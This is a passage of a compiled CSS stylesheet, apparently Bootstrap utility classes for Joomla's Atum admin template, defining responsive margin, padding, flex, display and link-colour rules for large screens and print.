  }

  .flex-lg-wrap-reverse {
    flex-wrap: wrap-reverse !important;
  }

  .gap-lg-0 {
    gap: 0 !important;
  }

  .gap-lg-1 {
    gap: 0.25rem !important;
  }

  .gap-lg-2 {
    gap: 0.5rem !important;
  }

  .gap-lg-3 {
    gap: 1rem !important;
  }

  .gap-lg-4 {
    gap: 1.5rem !important;
  }

  .gap-lg-5 {
    gap: 3rem !important;
  }

  .justify-content-lg-start {
    justify-content: flex-start !important;
  }

  .justify-content-lg-end {
    justify-content: flex-end !important;
  }

  .justify-content-lg-center {
    justify-content: center !important;
  }

  .justify-content-lg-between {
    justify-content: space-between !important;
  }

  .justify-content-lg-around {
    justify-content: space-around !important;
  }

  .justify-content-lg-evenly {
    justify-content: space-evenly !important;
  }

  .align-items-lg-start {
    align-items: flex-start !important;
  }

  .align-items-lg-end {
    align-items: flex-end !important;
  }

  .align-items-lg-center {
    align-items: center !important;
  }

  .align-items-lg-baseline {
    align-items: baseline !important;
  }

  .align-items-lg-stretch {
    align-items: stretch !important;
  }

  .align-content-lg-start {
    align-content: flex-start !important;
  }

  .align-content-lg-end {
    align-content: flex-end !important;
  }

  .align-content-lg-center {
    align-content: center !important;
  }

  .align-content-lg-between {
    align-content: space-between !important;
  }

  .align-content-lg-around {
    align-content: space-around !important;
  }

  .align-content-lg-stretch {
    align-content: stretch !important;
  }

  .align-self-lg-auto {
    align-self: auto !important;
  }

  .align-self-lg-start {
    align-self: flex-start !important;
  }

  .align-self-lg-end {
    align-self: flex-end !important;
  }

  .align-self-lg-center {
    align-self: center !important;
  }

  .align-self-lg-baseline {
    align-self: baseline !important;
  }

  .align-self-lg-stretch {
    align-self: stretch !important;
  }

  .order-lg-first {
    order: -1 !important;
  }

  .order-lg-0 {
    order: 0 !important;
  }

  .order-lg-1 {
    order: 1 !important;
  }

  .order-lg-2 {
    order: 2 !important;
  }

  .order-lg-3 {
    order: 3 !important;
  }

  .order-lg-4 {
    order: 4 !important;
  }

  .order-lg-5 {
    order: 5 !important;
  }

  .order-lg-last {
    order: 6 !important;
  }

  .m-lg-0 {
    margin: 0 !important;
  }

  .m-lg-1 {
    margin: 0.25rem !important;
  }

  .m-lg-2 {
    margin: 0.5rem !important;
  }

  .m-lg-3 {
    margin: 1rem !important;
  }

  .m-lg-4 {
    margin: 1.5rem !important;
  }

  .m-lg-5 {
    margin: 3rem !important;
  }

  .m-lg-auto {
    margin: auto !important;
  }

  .mx-lg-0 {
    margin-right: 0 !important;
    margin-left: 0 !important;
  }

  .mx-lg-1 {
    margin-right: 0.25rem !important;
    margin-left: 0.25rem !important;
  }

  .mx-lg-2 {
    margin-right: 0.5rem !important;
    margin-left: 0.5rem !important;
  }

  .mx-lg-3 {
    margin-right: 1rem !important;
    margin-left: 1rem !important;
  }

  .mx-lg-4 {
    margin-right: 1.5rem !important;
    margin-left: 1.5rem !important;
  }

  .mx-lg-5 {
    margin-right: 3rem !important;
    margin-left: 3rem !important;
  }

  .mx-lg-auto {
    margin-right: auto !important;
    margin-left: auto !important;
  }

  .my-lg-0 {
    margin-top: 0 !important;
    margin-bottom: 0 !important;
  }

  .my-lg-1 {
    margin-top: 0.25rem !important;
    margin-bottom: 0.25rem !important;
  }

  .my-lg-2 {
    margin-top: 0.5rem !important;
    margin-bottom: 0.5rem !important;
  }

  .my-lg-3 {
    margin-top: 1rem !important;
    margin-bottom: 1rem !important;
  }

  .my-lg-4 {
    margin-top: 1.5rem !important;
    margin-bottom: 1.5rem !important;
  }

  .my-lg-5 {
    margin-top: 3rem !important;
    margin-bottom: 3rem !important;
  }

  .my-lg-auto {
    margin-top: auto !important;
    margin-bottom: auto !important;
  }

  .mt-lg-0 {
    margin-top: 0 !important;
  }

  .mt-lg-1 {
    margin-top: 0.25rem !important;
  }

  .mt-lg-2 {
    margin-top: 0.5rem !important;
  }

  .mt-lg-3 {
    margin-top: 1rem !important;
  }

  .mt-lg-4 {
    margin-top: 1.5rem !important;
  }

  .mt-lg-5 {
    margin-top: 3rem !important;
  }

  .mt-lg-auto {
    margin-top: auto !important;
  }

  .me-lg-0 {
    margin-right: 0 !important;
  }

  .me-lg-1 {
    margin-right: 0.25rem !important;
  }

  .me-lg-2 {
    margin-right: 0.5rem !important;
  }

  .me-lg-3 {
    margin-right: 1rem !important;
  }

  .me-lg-4 {
    margin-right: 1.5rem !important;
  }

  .me-lg-5 {
    margin-right: 3rem !important;
  }

  .me-lg-auto {
    margin-right: auto !important;
  }

  .mb-lg-0 {
    margin-bottom: 0 !important;
  }

  .mb-lg-1 {
    margin-bottom: 0.25rem !important;
  }

  .mb-lg-2 {
    margin-bottom: 0.5rem !important;
  }

  .mb-lg-3 {
    margin-bottom: 1rem !important;
  }

  .mb-lg-4 {
    margin-bottom: 1.5rem !important;
  }

  .mb-lg-5 {
    margin-bottom: 3rem !important;
  }

  .mb-lg-auto {
    margin-bottom: auto !important;
  }

  .ms-lg-0 {
    margin-left: 0 !important;
  }

  .ms-lg-1 {
    margin-left: 0.25rem !important;
  }

  .ms-lg-2 {
    margin-left: 0.5rem !important;
  }

  .ms-lg-3 {
    margin-left: 1rem !important;
  }

  .ms-lg-4 {
    margin-left: 1.5rem !important;
  }

  .ms-lg-5 {
    margin-left: 3rem !important;
  }

  .ms-lg-auto {
    margin-left: auto !important;
  }

  .p-lg-0 {
    padding: 0 !important;
  }

  .p-lg-1 {
    padding: 0.25rem !important;
  }

  .p-lg-2 {
    padding: 0.5rem !important;
  }

  .p-lg-3 {
    padding: 1rem !important;
  }

  .p-lg-4 {
    padding: 1.5rem !important;
  }

  .p-lg-5 {
    padding: 3rem !important;
  }

  .px-lg-0 {
    padding-right: 0 !important;
    padding-left: 0 !important;
  }

  .px-lg-1 {
    padding-right: 0.25rem !important;
    padding-left: 0.25rem !important;
  }

  .px-lg-2 {
    padding-right: 0.5rem !important;
    padding-left: 0.5rem !important;
  }

  .px-lg-3 {
    padding-right: 1rem !important;
    padding-left: 1rem !important;
  }

  .px-lg-4 {
    padding-right: 1.5rem !important;
    padding-left: 1.5rem !important;
  }

  .px-lg-5 {
    padding-right: 3rem !important;
    padding-left: 3rem !important;
  }

  .py-lg-0 {
    padding-top: 0 !important;
    padding-bottom: 0 !important;
  }

  .py-lg-1 {
    padding-top: 0.25rem !important;
    padding-bottom: 0.25rem !important;
  }

  .py-lg-2 {
    padding-top: 0.5rem !important;
    padding-bottom: 0.5rem !important;
  }

  .py-lg-3 {
    padding-top: 1rem !important;
    padding-bottom: 1rem !important;
  }

  .py-lg-4 {
    padding-top: 1.5rem !important;
    padding-bottom: 1.5rem !important;
  }

  .py-lg-5 {
    padding-top: 3rem !important;
    padding-bottom: 3rem !important;
  }

  .pt-lg-0 {
    padding-top: 0 !important;
  }

  .pt-lg-1 {
    padding-top: 0.25rem !important;
  }

  .pt-lg-2 {
    padding-top: 0.5rem !important;
  }

  .pt-lg-3 {
    padding-top: 1rem !important;
  }

  .pt-lg-4 {
    padding-top: 1.5rem !important;
  }

  .pt-lg-5 {
    padding-top: 3rem !important;
  }

  .pe-lg-0 {
    padding-right: 0 !important;
  }

  .pe-lg-1 {
    padding-right: 0.25rem !important;
  }

  .pe-lg-2 {
    padding-right: 0.5rem !important;
  }

  .pe-lg-3 {
    padding-right: 1rem !important;
  }

  .pe-lg-4 {
    padding-right: 1.5rem !important;
  }

  .pe-lg-5 {
    padding-right: 3rem !important;
  }

  .pb-lg-0 {
    padding-bottom: 0 !important;
  }

  .pb-lg-1 {
    padding-bottom: 0.25rem !important;
  }

  .pb-lg-2 {
    padding-bottom: 0.5rem !important;
  }

  .pb-lg-3 {
    padding-bottom: 1rem !important;
  }

  .pb-lg-4 {
    padding-bottom: 1.5rem !important;
  }

  .pb-lg-5 {
    padding-bottom: 3rem !important;
  }

  .ps-lg-0 {
    padding-left: 0 !important;
  }

  .ps-lg-1 {
    padding-left: 0.25rem !important;
  }

  .ps-lg-2 {
    padding-left: 0.5rem !important;
  }

  .ps-lg-3 {
    padding-left: 1rem !important;
  }

  .ps-lg-4 {
    padding-left: 1.5rem !important;
  }

  .ps-lg-5 {
    padding-left: 3rem !important;
  }

  .text-lg-start {
    text-align: left !important;
  }

  .text-lg-end {
    text-align: right !important;
  }

  .text-lg-center {
    text-align: center !important;
  }
}
@media (min-width: 1200px) {
  .float-xl-start {
    float: left !important;
  }

  .float-xl-end {
    float: right !important;
  }

  .float-xl-none {
    float: none !important;
  }

  .d-xl-inline {
    display: inline !important;
  }

  .d-xl-inline-block {
    display: inline-block !important;
  }

  .d-xl-block {
    display: block !important;
  }

  .d-xl-grid {
    display: grid !important;
  }

  .d-xl-table {
    display: table !important;
  }

  .d-xl-table-row {
    display: table-row !important;
  }

  .d-xl-table-cell {
    display: table-cell !important;
  }

  .d-xl-flex {
    display: flex !important;
  }

  .d-xl-inline-flex {
    display: inline-flex !important;
  }

  .d-xl-none {
    display: none !important;
  }

  .flex-xl-fill {
    flex: 1 1 auto !important;
  }

  .flex-xl-row {
    flex-direction: row !important;
  }

  .flex-xl-column {
    flex-direction: column !important;
  }

  .flex-xl-row-reverse {
    flex-direction: row-reverse !important;
  }

  .flex-xl-column-reverse {
    flex-direction: column-reverse !important;
  }

  .flex-xl-grow-0 {
    flex-grow: 0 !important;
  }

  .flex-xl-grow-1 {
    flex-grow: 1 !important;
  }

  .flex-xl-shrink-0 {
    flex-shrink: 0 !important;
  }

  .flex-xl-shrink-1 {
    flex-shrink: 1 !important;
  }

  .flex-xl-wrap {
    flex-wrap: wrap !important;
  }

  .flex-xl-nowrap {
    flex-wrap: nowrap !important;
  }

  .flex-xl-wrap-reverse {
    flex-wrap: wrap-reverse !important;
  }

  .gap-xl-0 {
    gap: 0 !important;
  }

  .gap-xl-1 {
    gap: 0.25rem !important;
  }

  .gap-xl-2 {
    gap: 0.5rem !important;
  }

  .gap-xl-3 {
    gap: 1rem !important;
  }

  .gap-xl-4 {
    gap: 1.5rem !important;
  }

  .gap-xl-5 {
    gap: 3rem !important;
  }

  .justify-content-xl-start {
    justify-content: flex-start !important;
  }

  .justify-content-xl-end {
    justify-content: flex-end !important;
  }

  .justify-content-xl-center {
    justify-content: center !important;
  }

  .justify-content-xl-between {
    justify-content: space-between !important;
  }

  .justify-content-xl-around {
    justify-content: space-around !important;
  }

  .justify-content-xl-evenly {
    justify-content: space-evenly !important;
  }

  .align-items-xl-start {
    align-items: flex-start !important;
  }

  .align-items-xl-end {
    align-items: flex-end !important;
  }

  .align-items-xl-center {
    align-items: center !important;
  }

  .align-items-xl-baseline {
    align-items: baseline !important;
  }

  .align-items-xl-stretch {
    align-items: stretch !important;
  }

  .align-content-xl-start {
    align-content: flex-start !important;
  }

  .align-content-xl-end {
    align-content: flex-end !important;
  }

  .align-content-xl-center {
    align-content: center !important;
  }

  .align-content-xl-between {
    align-content: space-between !important;
  }

  .align-content-xl-around {
    align-content: space-around !important;
  }

  .align-content-xl-stretch {
    align-content: stretch !important;
  }

  .align-self-xl-auto {
    align-self: auto !important;
  }

  .align-self-xl-start {
    align-self: flex-start !important;
  }

  .align-self-xl-end {
    align-self: flex-end !important;
  }

  .align-self-xl-center {
    align-self: center !important;
  }

  .align-self-xl-baseline {
    align-self: baseline !important;
  }

  .align-self-xl-stretch {
    align-self: stretch !important;
  }

  .order-xl-first {
    order: -1 !important;
  }

  .order-xl-0 {
    order: 0 !important;
  }

  .order-xl-1 {
    order: 1 !important;
  }

  .order-xl-2 {
    order: 2 !important;
  }

  .order-xl-3 {
    order: 3 !important;
  }

  .order-xl-4 {
    order: 4 !important;
  }

  .order-xl-5 {
    order: 5 !important;
  }

  .order-xl-last {
    order: 6 !important;
  }

  .m-xl-0 {
    margin: 0 !important;
  }

  .m-xl-1 {
    margin: 0.25rem !important;
  }

  .m-xl-2 {
    margin: 0.5rem !important;
  }

  .m-xl-3 {
    margin: 1rem !important;
  }

  .m-xl-4 {
    margin: 1.5rem !important;
  }

  .m-xl-5 {
    margin: 3rem !important;
  }

  .m-xl-auto {
    margin: auto !important;
  }

  .mx-xl-0 {
    margin-right: 0 !important;
    margin-left: 0 !important;
  }

  .mx-xl-1 {
    margin-right: 0.25rem !important;
    margin-left: 0.25rem !important;
  }

  .mx-xl-2 {
    margin-right: 0.5rem !important;
    margin-left: 0.5rem !important;
  }

  .mx-xl-3 {
    margin-right: 1rem !important;
    margin-left: 1rem !important;
  }

  .mx-xl-4 {
    margin-right: 1.5rem !important;
    margin-left: 1.5rem !important;
  }

  .mx-xl-5 {
    margin-right: 3rem !important;
    margin-left: 3rem !important;
  }

  .mx-xl-auto {
    margin-right: auto !important;
    margin-left: auto !important;
  }

  .my-xl-0 {
    margin-top: 0 !important;
    margin-bottom: 0 !important;
  }

  .my-xl-1 {
    margin-top: 0.25rem !important;
    margin-bottom: 0.25rem !important;
  }

  .my-xl-2 {
    margin-top: 0.5rem !important;
    margin-bottom: 0.5rem !important;
  }

  .my-xl-3 {
    margin-top: 1rem !important;
    margin-bottom: 1rem !important;
  }

  .my-xl-4 {
    margin-top: 1.5rem !important;
    margin-bottom: 1.5rem !important;
  }

  .my-xl-5 {
    margin-top: 3rem !important;
    margin-bottom: 3rem !important;
  }

  .my-xl-auto {
    margin-top: auto !important;
    margin-bottom: auto !important;
  }

  .mt-xl-0 {
    margin-top: 0 !important;
  }

  .mt-xl-1 {
    margin-top: 0.25rem !important;
  }

  .mt-xl-2 {
    margin-top: 0.5rem !important;
  }

  .mt-xl-3 {
    margin-top: 1rem !important;
  }

  .mt-xl-4 {
    margin-top: 1.5rem !important;
  }

  .mt-xl-5 {
    margin-top: 3rem !important;
  }

  .mt-xl-auto {
    margin-top: auto !important;
  }

  .me-xl-0 {
    margin-right: 0 !important;
  }

  .me-xl-1 {
    margin-right: 0.25rem !important;
  }

  .me-xl-2 {
    margin-right: 0.5rem !important;
  }

  .me-xl-3 {
    margin-right: 1rem !important;
  }

  .me-xl-4 {
    margin-right: 1.5rem !important;
  }

  .me-xl-5 {
    margin-right: 3rem !important;
  }

  .me-xl-auto {
    margin-right: auto !important;
  }

  .mb-xl-0 {
    margin-bottom: 0 !important;
  }

  .mb-xl-1 {
    margin-bottom: 0.25rem !important;
  }

  .mb-xl-2 {
    margin-bottom: 0.5rem !important;
  }

  .mb-xl-3 {
    margin-bottom: 1rem !important;
  }

  .mb-xl-4 {
    margin-bottom: 1.5rem !important;
  }

  .mb-xl-5 {
    margin-bottom: 3rem !important;
  }

  .mb-xl-auto {
    margin-bottom: auto !important;
  }

  .ms-xl-0 {
    margin-left: 0 !important;
  }

  .ms-xl-1 {
    margin-left: 0.25rem !important;
  }

  .ms-xl-2 {
    margin-left: 0.5rem !important;
  }

  .ms-xl-3 {
    margin-left: 1rem !important;
  }

  .ms-xl-4 {
    margin-left: 1.5rem !important;
  }

  .ms-xl-5 {
    margin-left: 3rem !important;
  }

  .ms-xl-auto {
    margin-left: auto !important;
  }

  .p-xl-0 {
    padding: 0 !important;
  }

  .p-xl-1 {
    padding: 0.25rem !important;
  }

  .p-xl-2 {
    padding: 0.5rem !important;
  }

  .p-xl-3 {
    padding: 1rem !important;
  }

  .p-xl-4 {
    padding: 1.5rem !important;
  }

  .p-xl-5 {
    padding: 3rem !important;
  }

  .px-xl-0 {
    padding-right: 0 !important;
    padding-left: 0 !important;
  }

  .px-xl-1 {
    padding-right: 0.25rem !important;
    padding-left: 0.25rem !important;
  }

  .px-xl-2 {
    padding-right: 0.5rem !important;
    padding-left: 0.5rem !important;
  }

  .px-xl-3 {
    padding-right: 1rem !important;
    padding-left: 1rem !important;
  }

  .px-xl-4 {
    padding-right: 1.5rem !important;
    padding-left: 1.5rem !important;
  }

  .px-xl-5 {
    padding-right: 3rem !important;
    padding-left: 3rem !important;
  }

  .py-xl-0 {
    padding-top: 0 !important;
    padding-bottom: 0 !important;
  }

  .py-xl-1 {
    padding-top: 0.25rem !important;
    padding-bottom: 0.25rem !important;
  }

  .py-xl-2 {
    padding-top: 0.5rem !important;
    padding-bottom: 0.5rem !important;
  }

  .py-xl-3 {
    padding-top: 1rem !important;
    padding-bottom: 1rem !important;
  }

  .py-xl-4 {
    padding-top: 1.5rem !important;
    padding-bottom: 1.5rem !important;
  }

  .py-xl-5 {
    padding-top: 3rem !important;
    padding-bottom: 3rem !important;
  }

  .pt-xl-0 {
    padding-top: 0 !important;
  }

  .pt-xl-1 {
    padding-top: 0.25rem !important;
  }

  .pt-xl-2 {
    padding-top: 0.5rem !important;
  }

  .pt-xl-3 {
    padding-top: 1rem !important;
  }

  .pt-xl-4 {
    padding-top: 1.5rem !important;
  }

  .pt-xl-5 {
    padding-top: 3rem !important;
  }

  .pe-xl-0 {
    padding-right: 0 !important;
  }

  .pe-xl-1 {
    padding-right: 0.25rem !important;
  }

  .pe-xl-2 {
    padding-right: 0.5rem !important;
  }

  .pe-xl-3 {
    padding-right: 1rem !important;
  }

  .pe-xl-4 {
    padding-right: 1.5rem !important;
  }

  .pe-xl-5 {
    padding-right: 3rem !important;
  }

  .pb-xl-0 {
    padding-bottom: 0 !important;
  }

  .pb-xl-1 {
    padding-bottom: 0.25rem !important;
  }

  .pb-xl-2 {
    padding-bottom: 0.5rem !important;
  }

  .pb-xl-3 {
    padding-bottom: 1rem !important;
  }

  .pb-xl-4 {
    padding-bottom: 1.5rem !important;
  }

  .pb-xl-5 {
    padding-bottom: 3rem !important;
  }

  .ps-xl-0 {
    padding-left: 0 !important;
  }

  .ps-xl-1 {
    padding-left: 0.25rem !important;
  }

  .ps-xl-2 {
    padding-left: 0.5rem !important;
  }

  .ps-xl-3 {
    padding-left: 1rem !important;
  }

  .ps-xl-4 {
    padding-left: 1.5rem !important;
  }

  .ps-xl-5 {
    padding-left: 3rem !important;
  }

  .text-xl-start {
    text-align: left !important;
  }

  .text-xl-end {
    text-align: right !important;
  }

  .text-xl-center {
    text-align: center !important;
  }
}
@media (min-width: 1400px) {
  .float-xxl-start {
    float: left !important;
  }

  .float-xxl-end {
    float: right !important;
  }

  .float-xxl-none {
    float: none !important;
  }

  .d-xxl-inline {
    display: inline !important;
  }

  .d-xxl-inline-block {
    display: inline-block !important;
  }

  .d-xxl-block {
    display: block !important;
  }

  .d-xxl-grid {
    display: grid !important;
  }

  .d-xxl-table {
    display: table !important;
  }

  .d-xxl-table-row {
    display: table-row !important;
  }

  .d-xxl-table-cell {
    display: table-cell !important;
  }

  .d-xxl-flex {
    display: flex !important;
  }

  .d-xxl-inline-flex {
    display: inline-flex !important;
  }

  .d-xxl-none {
    display: none !important;
  }

  .flex-xxl-fill {
    flex: 1 1 auto !important;
  }

  .flex-xxl-row {
    flex-direction: row !important;
  }

  .flex-xxl-column {
    flex-direction: column !important;
  }

  .flex-xxl-row-reverse {
    flex-direction: row-reverse !important;
  }

  .flex-xxl-column-reverse {
    flex-direction: column-reverse !important;
  }

  .flex-xxl-grow-0 {
    flex-grow: 0 !important;
  }

  .flex-xxl-grow-1 {
    flex-grow: 1 !important;
  }

  .flex-xxl-shrink-0 {
    flex-shrink: 0 !important;
  }

  .flex-xxl-shrink-1 {
    flex-shrink: 1 !important;
  }

  .flex-xxl-wrap {
    flex-wrap: wrap !important;
  }

  .flex-xxl-nowrap {
    flex-wrap: nowrap !important;
  }

  .flex-xxl-wrap-reverse {
    flex-wrap: wrap-reverse !important;
  }

  .gap-xxl-0 {
    gap: 0 !important;
  }

  .gap-xxl-1 {
    gap: 0.25rem !important;
  }

  .gap-xxl-2 {
    gap: 0.5rem !important;
  }

  .gap-xxl-3 {
    gap: 1rem !important;
  }

  .gap-xxl-4 {
    gap: 1.5rem !important;
  }

  .gap-xxl-5 {
    gap: 3rem !important;
  }

  .justify-content-xxl-start {
    justify-content: flex-start !important;
  }

  .justify-content-xxl-end {
    justify-content: flex-end !important;
  }

  .justify-content-xxl-center {
    justify-content: center !important;
  }

  .justify-content-xxl-between {
    justify-content: space-between !important;
  }

  .justify-content-xxl-around {
    justify-content: space-around !important;
  }

  .justify-content-xxl-evenly {
    justify-content: space-evenly !important;
  }

  .align-items-xxl-start {
    align-items: flex-start !important;
  }

  .align-items-xxl-end {
    align-items: flex-end !important;
  }

  .align-items-xxl-center {
    align-items: center !important;
  }

  .align-items-xxl-baseline {
    align-items: baseline !important;
  }

  .align-items-xxl-stretch {
    align-items: stretch !important;
  }

  .align-content-xxl-start {
    align-content: flex-start !important;
  }

  .align-content-xxl-end {
    align-content: flex-end !important;
  }

  .align-content-xxl-center {
    align-content: center !important;
  }

  .align-content-xxl-between {
    align-content: space-between !important;
  }

  .align-content-xxl-around {
    align-content: space-around !important;
  }

  .align-content-xxl-stretch {
    align-content: stretch !important;
  }

  .align-self-xxl-auto {
    align-self: auto !important;
  }

  .align-self-xxl-start {
    align-self: flex-start !important;
  }

  .align-self-xxl-end {
    align-self: flex-end !important;
  }

  .align-self-xxl-center {
    align-self: center !important;
  }

  .align-self-xxl-baseline {
    align-self: baseline !important;
  }

  .align-self-xxl-stretch {
    align-self: stretch !important;
  }

  .order-xxl-first {
    order: -1 !important;
  }

  .order-xxl-0 {
    order: 0 !important;
  }

  .order-xxl-1 {
    order: 1 !important;
  }

  .order-xxl-2 {
    order: 2 !important;
  }

  .order-xxl-3 {
    order: 3 !important;
  }

  .order-xxl-4 {
    order: 4 !important;
  }

  .order-xxl-5 {
    order: 5 !important;
  }

  .order-xxl-last {
    order: 6 !important;
  }

  .m-xxl-0 {
    margin: 0 !important;
  }

  .m-xxl-1 {
    margin: 0.25rem !important;
  }

  .m-xxl-2 {
    margin: 0.5rem !important;
  }

  .m-xxl-3 {
    margin: 1rem !important;
  }

  .m-xxl-4 {
    margin: 1.5rem !important;
  }

  .m-xxl-5 {
    margin: 3rem !important;
  }

  .m-xxl-auto {
    margin: auto !important;
  }

  .mx-xxl-0 {
    margin-right: 0 !important;
    margin-left: 0 !important;
  }

  .mx-xxl-1 {
    margin-right: 0.25rem !important;
    margin-left: 0.25rem !important;
  }

  .mx-xxl-2 {
    margin-right: 0.5rem !important;
    margin-left: 0.5rem !important;
  }

  .mx-xxl-3 {
    margin-right: 1rem !important;
    margin-left: 1rem !important;
  }

  .mx-xxl-4 {
    margin-right: 1.5rem !important;
    margin-left: 1.5rem !important;
  }

  .mx-xxl-5 {
    margin-right: 3rem !important;
    margin-left: 3rem !important;
  }

  .mx-xxl-auto {
    margin-right: auto !important;
    margin-left: auto !important;
  }

  .my-xxl-0 {
    margin-top: 0 !important;
    margin-bottom: 0 !important;
  }

  .my-xxl-1 {
    margin-top: 0.25rem !important;
    margin-bottom: 0.25rem !important;
  }

  .my-xxl-2 {
    margin-top: 0.5rem !important;
    margin-bottom: 0.5rem !important;
  }

  .my-xxl-3 {
    margin-top: 1rem !important;
    margin-bottom: 1rem !important;
  }

  .my-xxl-4 {
    margin-top: 1.5rem !important;
    margin-bottom: 1.5rem !important;
  }

  .my-xxl-5 {
    margin-top: 3rem !important;
    margin-bottom: 3rem !important;
  }

  .my-xxl-auto {
    margin-top: auto !important;
    margin-bottom: auto !important;
  }

  .mt-xxl-0 {
    margin-top: 0 !important;
  }

  .mt-xxl-1 {
    margin-top: 0.25rem !important;
  }

  .mt-xxl-2 {
    margin-top: 0.5rem !important;
  }

  .mt-xxl-3 {
    margin-top: 1rem !important;
  }

  .mt-xxl-4 {
    margin-top: 1.5rem !important;
  }

  .mt-xxl-5 {
    margin-top: 3rem !important;
  }

  .mt-xxl-auto {
    margin-top: auto !important;
  }

  .me-xxl-0 {
    margin-right: 0 !important;
  }

  .me-xxl-1 {
    margin-right: 0.25rem !important;
  }

  .me-xxl-2 {
    margin-right: 0.5rem !important;
  }

  .me-xxl-3 {
    margin-right: 1rem !important;
  }

  .me-xxl-4 {
    margin-right: 1.5rem !important;
  }

  .me-xxl-5 {
    margin-right: 3rem !important;
  }

  .me-xxl-auto {
    margin-right: auto !important;
  }

  .mb-xxl-0 {
    margin-bottom: 0 !important;
  }

  .mb-xxl-1 {
    margin-bottom: 0.25rem !important;
  }

  .mb-xxl-2 {
    margin-bottom: 0.5rem !important;
  }

  .mb-xxl-3 {
    margin-bottom: 1rem !important;
  }

  .mb-xxl-4 {
    margin-bottom: 1.5rem !important;
  }

  .mb-xxl-5 {
    margin-bottom: 3rem !important;
  }

  .mb-xxl-auto {
    margin-bottom: auto !important;
  }

  .ms-xxl-0 {
    margin-left: 0 !important;
  }

  .ms-xxl-1 {
    margin-left: 0.25rem !important;
  }

  .ms-xxl-2 {
    margin-left: 0.5rem !important;
  }

  .ms-xxl-3 {
    margin-left: 1rem !important;
  }

  .ms-xxl-4 {
    margin-left: 1.5rem !important;
  }

  .ms-xxl-5 {
    margin-left: 3rem !important;
  }

  .ms-xxl-auto {
    margin-left: auto !important;
  }

  .p-xxl-0 {
    padding: 0 !important;
  }

  .p-xxl-1 {
    padding: 0.25rem !important;
  }

  .p-xxl-2 {
    padding: 0.5rem !important;
  }

  .p-xxl-3 {
    padding: 1rem !important;
  }

  .p-xxl-4 {
    padding: 1.5rem !important;
  }

  .p-xxl-5 {
    padding: 3rem !important;
  }

  .px-xxl-0 {
    padding-right: 0 !important;
    padding-left: 0 !important;
  }

  .px-xxl-1 {
    padding-right: 0.25rem !important;
    padding-left: 0.25rem !important;
  }

  .px-xxl-2 {
    padding-right: 0.5rem !important;
    padding-left: 0.5rem !important;
  }

  .px-xxl-3 {
    padding-right: 1rem !important;
    padding-left: 1rem !important;
  }

  .px-xxl-4 {
    padding-right: 1.5rem !important;
    padding-left: 1.5rem !important;
  }

  .px-xxl-5 {
    padding-right: 3rem !important;
    padding-left: 3rem !important;
  }

  .py-xxl-0 {
    padding-top: 0 !important;
    padding-bottom: 0 !important;
  }

  .py-xxl-1 {
    padding-top: 0.25rem !important;
    padding-bottom: 0.25rem !important;
  }

  .py-xxl-2 {
    padding-top: 0.5rem !important;
    padding-bottom: 0.5rem !important;
  }

  .py-xxl-3 {
    padding-top: 1rem !important;
    padding-bottom: 1rem !important;
  }

  .py-xxl-4 {
    padding-top: 1.5rem !important;
    padding-bottom: 1.5rem !important;
  }

  .py-xxl-5 {
    padding-top: 3rem !important;
    padding-bottom: 3rem !important;
  }

  .pt-xxl-0 {
    padding-top: 0 !important;
  }

  .pt-xxl-1 {
    padding-top: 0.25rem !important;
  }

  .pt-xxl-2 {
    padding-top: 0.5rem !important;
  }

  .pt-xxl-3 {
    padding-top: 1rem !important;
  }

  .pt-xxl-4 {
    padding-top: 1.5rem !important;
  }

  .pt-xxl-5 {
    padding-top: 3rem !important;
  }

  .pe-xxl-0 {
    padding-right: 0 !important;
  }

  .pe-xxl-1 {
    padding-right: 0.25rem !important;
  }

  .pe-xxl-2 {
    padding-right: 0.5rem !important;
  }

  .pe-xxl-3 {
    padding-right: 1rem !important;
  }

  .pe-xxl-4 {
    padding-right: 1.5rem !important;
  }

  .pe-xxl-5 {
    padding-right: 3rem !important;
  }

  .pb-xxl-0 {
    padding-bottom: 0 !important;
  }

  .pb-xxl-1 {
    padding-bottom: 0.25rem !important;
  }

  .pb-xxl-2 {
    padding-bottom: 0.5rem !important;
  }

  .pb-xxl-3 {
    padding-bottom: 1rem !important;
  }

  .pb-xxl-4 {
    padding-bottom: 1.5rem !important;
  }

  .pb-xxl-5 {
    padding-bottom: 3rem !important;
  }

  .ps-xxl-0 {
    padding-left: 0 !important;
  }

  .ps-xxl-1 {
    padding-left: 0.25rem !important;
  }

  .ps-xxl-2 {
    padding-left: 0.5rem !important;
  }

  .ps-xxl-3 {
    padding-left: 1rem !important;
  }

  .ps-xxl-4 {
    padding-left: 1.5rem !important;
  }

  .ps-xxl-5 {
    padding-left: 3rem !important;
  }

  .text-xxl-start {
    text-align: left !important;
  }

  .text-xxl-end {
    text-align: right !important;
  }

  .text-xxl-center {
    text-align: center !important;
  }
}
@media (min-width: 1200px) {
  .fs-1 {
    font-size: 1.65rem !important;
  }

  .fs-2 {
    font-size: 1.5rem !important;
  }
}
@media print {
  .d-print-inline {
    display: inline !important;
  }

  .d-print-inline-block {
    display: inline-block !important;
  }

  .d-print-block {
    display: block !important;
  }

  .d-print-grid {
    display: grid !important;
  }

  .d-print-table {
    display: table !important;
  }

  .d-print-table-row {
    display: table-row !important;
  }

  .d-print-table-cell {
    display: table-cell !important;
  }

  .d-print-flex {
    display: flex !important;
  }

  .d-print-inline-flex {
    display: inline-flex !important;
  }

  .d-print-none {
    display: none !important;
  }
}
.clearfix::after {
  display: block;
  clear: both;
  content: "";
}

.link-primary {
  color: #132f53;
}
.link-primary:hover, .link-primary:focus {
  color: #0f2642;
}

.link-secondary {
  color: #495057;
}
.link-secondary:hover, .link-secondary:focus {
  color: #3a4046;
}

.link-success {
  color: #457d54;
}
.link-success:hover, .link-success:focus {
  color: #376443;
}

.link-info {
  color: #2a69b8;
}
.link-info:hover, .link-info:focus {
  color: #225493;
}

.link-warning {
  color: #ffb514;
}
.link-warning:hover, .link-warning:focus {
  color: #ffc443;
}

.link-danger {
  color: #c52827;
}
.link-danger:hover, .link-danger:focus {
  color: #9e201f;
}

.link-light {
  color: #f8f9fa;
}
.link-light:hover, .link-light:focus {
  color: #f9fafb;
}

.link-dark {
  color: #212529;
}
.link-dark:hover, .link-dark:focus {
  color: #1a1e21;
}

.link-atum-link-color {
  color: #2a69b8;
}
.link-atum-link-color:hover, .link-atum-link-color:focus {
  color: #225493;
}

.link-atum-text-dark {
  color: #495057;
}
.link-atum-text-dark:hover, .link-atum-text-dark:focus {
  color: #3a4046;
}

.link-action {
  color: #132f53;
}
.link-action:hover, .link-action:focus {
  color: #0f2642;
}

.link-error {
  color: #3b0d0c;
}
.link-error:hover, .link-error:focus {
  color: #2f0a0a;
}

.link-alert-success {
  color: #0f2f21;
}
